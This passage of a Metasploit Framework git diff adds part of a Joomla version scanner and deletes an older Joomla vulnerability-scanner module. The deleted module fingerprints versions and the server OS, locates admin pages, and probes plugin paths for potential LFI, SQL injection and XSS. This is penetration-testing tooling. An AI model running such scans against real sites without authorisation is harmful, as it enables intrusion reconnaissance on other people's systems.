'method' => 'GET' + }) + + return :abort if res.nil? + + res.body.gsub!(/[\r|\n]/, ' ') + + if (res.code == 200) + os = os_fingerprint(res) + out = fingerprint(res) + return false if not out + + if(out =~ /Unknown Joomla/) + print_error("#{peer} - Unable to identify Joomla Version with #{file}") + return false + else + print_good("#{peer} - Joomla Version:#{out} from: #{file} ") + print_good("#{peer} - OS: #{os}") + report_note( + :host => ip, + :port => datastore['RPORT'], + :proto => 'http', + :ntype => 'joomla_version', + :data => out + ) + return true + end + elsif (res.code == 403) + if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) + vprint_status("#{ip} denied access to #{ip} (SSL Required)") + elsif(res.body =~ /has a list of IP addresses that are not allowed/) + vprint_status("#{ip} restricted access by IP") + elsif(res.body =~ /SSL client certificate is required/) + vprint_status("#{ip} requires a SSL client certificate") + else + vprint_status("#{ip} denied access to #{ip} #{res.code} #{res.message}") + end + return :abort + end + + return false + + rescue OpenSSL::SSL::SSLError + vprint_error("#{peer} - SSL error") + return :abort + rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + vprint_error("#{peer} - Unable to Connect") + return :abort + rescue ::Timeout::Error, ::Errno::EPIPE + vprint_error("#{peer} - Timeout error") + return :abort + end + + def run_host(ip) + tpath = normalize_uri(target_uri.path) + if tpath[-1,1] != '/' + tpath += '/' + end + + files = [ + 'language/en-GB/en-GB.xml', + 'templates/system/css/system.css', + 'media/system/js/mootools-more.js', + 'language/en-GB/en-GB.ini', + 'htaccess.txt', + 'language/en-GB/en-GB.com_media.ini' + ] + + vprint_status("#{peer} - Checking Joomla version") + files.each do |file| + joomla_found = check_file(tpath, file, ip) + return if joomla_found == :abort + break if joomla_found + end + end + +end diff --git a/modules/auxiliary/scanner/http/joomla_vulnscan.rb b/modules/auxiliary/scanner/http/joomla_vulnscan.rb deleted file mode 100755 index 2ad9d2f040..0000000000 --- a/modules/auxiliary/scanner/http/joomla_vulnscan.rb +++ /dev/null @@ -1,303 +0,0 @@ -## -# $Id: joomla_vulnscan.rb -## -## -# Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to Joomscan and various MSF modules for code examples. -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# web site for more information on licensing and terms of use. -# http://metasploit.com/ -## -require 'msf/core' - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::Remote::HttpClient - include Msf::Auxiliary::Scanner - include Msf::Auxiliary::Report - - def initialize - super( - 'Name' => 'Joomla Scanner', - 'Description' => %q{ - This module scans a Joomla install for information, plugins and potential vulnerabilites. - }, - 'Author' => [ 'newpid0' ], - 'License' => MSF_LICENSE - ) - register_options( - [ - OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/']), - OptBool.new('ENUMERATE', [ false, "Enumerate Plugins", true]), - - OptPath.new('PLUGINS', [ false, "Path to list of plugins to enumerate", - File.join(Msf::Config.install_root, "data", "wordlists", "joomla.txt") - ] - ) - - ], self.class) - end - - def osfingerprint(response) - if(response.headers.has_key?('Server') ) - if(response.headers['Server'] =~/Win32/ or response.headers['Server'] =~ /\(Windows/ or response.headers['Server'] =~ /IIS/) - os = "Windows" - elsif(response.headers['Server'] =~ /Apache\// and response.headers['Server'] !~/(Win32)/) - os = "*Nix" - else - os = "Unknown Server Header Reporting: "+response.headers['Server'] - end - end - return os - end - - def fingerprint(response) - if(response.body =~ /(.+)<\/version\/?>/i) - v = $1 - out = (v =~ /^6/) ? "Joomla #{v}" : " #{v}" - elsif(response.body =~ /system\.css 20196 2011\-01\-09 02\:40\:25Z ian/ or - response.body =~ /MooTools\.More\=\{version\:\"1\.3\.0\.1\"/ or - response.body =~ /en-GB\.ini 20196 2011\-01\-09 02\:40\:25Z ian/ or - response.body =~ /en-GB\.ini 20990 2011\-03\-18 16\:42\:30Z infograf768/ or - response.body =~/20196 2011\-01\-09 02\:40\:25Z ian/) - out = "1.6" - elsif(response.body =~ /system\.css 21322 2011\-05\-11 01\:10\:29Z dextercowley / or - response.body =~ /MooTools\.More\=\{version\:\"1\.3\.2\.1\"/ or response.body =~ /22183 2011\-09\-30 09\:04\:32Z infograf768/ or response.body =~ /21660 2011\-06\-23 13\:25\:32Z infograf768/) - out = "1.7" - elsif(response.body =~ /Joomla! 1.5/ or - response.body =~ /MooTools\=\{version\:\'1\.12\'\}/ or response.body =~ /11391 2009\-01\-04 13\:35\:50Z ian/) - out = "1.5" - elsif(response.body =~ /Copyright \(C\) 2005 \- 2012 Open Source Matters/ or - response.body =~ /MooTools.More\=\{version\:\"1\.4\.0\.1\"/ ) - out = "2.5" - elsif(response.body =~ /\s+ tpath, - 'method' => 'GET', - }, 5) - return if not bres or not bres.body or not bres.code - bres.body.gsub!(/[\r|\n]/, ' ') - File.open(datastore['PLUGINS'], 'rb').each_line do |bapp| - papp = bapp.chomp - plugin_search(tpath,papp,ip,bres) - end - end - end - - def check_app(tpath, app, ip) - res = send_request_cgi({ - 'uri' => "#{tpath}" << app, - 'method' => 'GET', - }) - return :abort if res.nil? - return if not res or not res.body or not res.code - res.body.gsub!(/[\r|\n]/, ' ') - os = osfingerprint(res) - if (res.code == 200) - out = fingerprint(res) - return if not out - if(out =~ /Unknown Joomla/) - print_error("#{peer} - Unable to identify Joomla Version with this file #{app}") - return false - else - print_good("#{peer} - Joomla Version:#{out} from: #{app} ") - print_good("#{peer} - OS: #{os}") - report_note( - :host => ip, - :port => datastore['RPORT'], - :proto => 'http', - :ntype => 'Joomla Version', - :data => out - ) - return true - end - elsif(res.code == 403) - if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) - vprint_status("#{ip} denied access to #{ip} (SSL Required)") - elsif(res.body =~ /has a list of IP addresses that are not allowed/) - vprint_status("#{ip} restricted access by IP") - elsif(res.body =~ /SSL client certificate is required/) - vprint_status("#{ip} requires a SSL client certificate") - else - vprint_status("#{ip} denied access to #{ip} #{res.code} #{res.message}") - end - else - return - end - rescue OpenSSL::SSL::SSLError - vprint_error("#{peer} - SSL error") - return - rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError - vprint_error("#{peer} - Unable to Connect") - return - rescue ::Timeout::Error, ::Errno::EPIPE - vprint_error("#{peer} - Timeout error") - return - end - - def scan_pages(tpath, iapp, ip) - res = send_request_cgi({ - 'uri' => "#{tpath}" << iapp, - 'method' => 'GET', - }) - return if not res or not res.body or not res.code - res.body.gsub!(/[\r|\n]/, ' ') - if (res.code == 200) - if(res.body =~ /Administration Login/ and res.body =~ /\(\'form-login\'\)\.submit/ or res.body =~/administration console/) - sout = "**Administrator Login Page" - elsif(res.body =~/Registration/ and res.body =~/class="validate">Register<\/button>/) - sout = "**Registration Page" - else - sout = iapp - end - return if not sout - if(sout == iapp) - print_good("#{peer} - Page: #{tpath}#{iapp}") - elsif print_good("#{peer} - Page: #{tpath}#{iapp} #{sout}") - report_note( - :host => ip, - :port => datastore['RPORT'], - :proto => 'http', - :ntype => 'Joomla Pages', - :data => sout - ) - end - elsif(res.code == 403) - if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) - vprint_status("#{ip} denied access to #{ip} (SSL Required)") - elsif(res.body =~ /has a list of IP addresses that are not allowed/) - vprint_status("#{ip} restricted access by IP") - elsif(res.body =~ /SSL client certificate is required/) - vprint_status("#{ip} requires a SSL client certificate") - else - vprint_status("#{ip} ip access to #{ip} #{res.code} #{res.message}") - end - else - return - end - rescue OpenSSL::SSL::SSLError - vprint_error("#{peer} - SSL error") - return - rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError - vprint_error("#{peer} - Unable to Connect") - return - rescue ::Timeout::Error, ::Errno::EPIPE - vprint_error("#{peer} - Timeout error") - return - end - - def plugin_search(tpath, papp, ip, bres) - res = send_request_cgi({ - 'uri' => "#{tpath}" << papp, - 'method' => 'GET', - }) - return if not res or not res.body or not res.code - res.body.gsub!(/[\r|\n]/, ' ') - osize = bres.body.size - nsize = res.body.size - if (res.code == 200 and res.body !~/#404 Component not found/ and res.body !~/

Joomla! Administration Login<\/h1>/ and osize != nsize) - print_good("#{peer} - Plugin: #{tpath}#{papp} ") - if (papp =~/passwd/ and res.body !~/root/) - vprint_error("#{peer} - Vulnerability: LFI not found") - elsif(papp =~/passwd/ and res.body =~/root/) - print_good("#{peer} - Vulnerability: Potential LFI") - elsif(papp =~/'/ or papp =~/union/ or papp =~/sqli/ or papp =~/-\d/ and papp !~/alert/ and res.body =~/SQL syntax/) - print_good("#{peer} - Vulnerability: Potential SQL Injection") - elsif(papp =~/'/ or papp =~/union/ or papp =~/sqli/ or papp =~/-\d/ and papp !~/alert/ and res.body !~/SQL syntax/) - vprint_error("#{peer} - Vulnerability: Unable to identify SQL injection") - elsif(papp =~/>alert/ and res.body !~/>alert/) - vprint_error("#{peer} - Vulnerability: No XSS") - elsif(papp =~/>alert/ and res.body =~/>alert/) - print_good("#{peer} - Vulnerability: Potential XSS") - elsif(res.body =~/SQL syntax/ ) - print_good("#{peer} - Vulnerability: Potential SQL Injection") - elsif(papp =~/com_/) - vars = papp.split('_') - pages = vars[1].gsub('/','') - res1 = send_request_cgi({ - 'uri' => "#{tpath}"<<"index.php?option=com_#{pages}", - 'method' => 'GET', - }, 5) - if (res1.code == 200) - print_good("#{peer} - Page: #{tpath}index.php?option=com_#{pages}") - else - vprint_error("#{peer} - Page: #{tpath}"<<"index.php?option=com_#{pages} gave a #{res1.code.to_s} response") - end - end - report_note( - :host => ip, - :port => datastore['RPORT'], - :proto => 'http', - :ntype => 'Plugin Found', - :data => papp - ) - elsif(res.code == 403) - if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) - vprint_status("#{ip} ip access to #{ip} (SSL Required)") - elsif(res.body =~ /has a list of IP addresses that are not allowed/) - vprint_status("#{ip} restricted access by IP") - elsif(res.body =~ /SSL client certificate is required/) - vprint_status("#{ip} requires a SSL client certificate") - else - vprint_status("#{ip} denied access to #{ip}#{tpath}#{papp} - #{res.code} #{res.message}") - end - else - return - end - - rescue OpenSSL::SSL::SSLError - vprint_error("#{peer} - SSL error") - return - rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError - vprint_error("#{peer} - Unable to Connect") - return - rescue ::Timeout::Error, ::Errno::EPIPE - vprint_error("#{peer} - Timeout error") - return - end - - - -end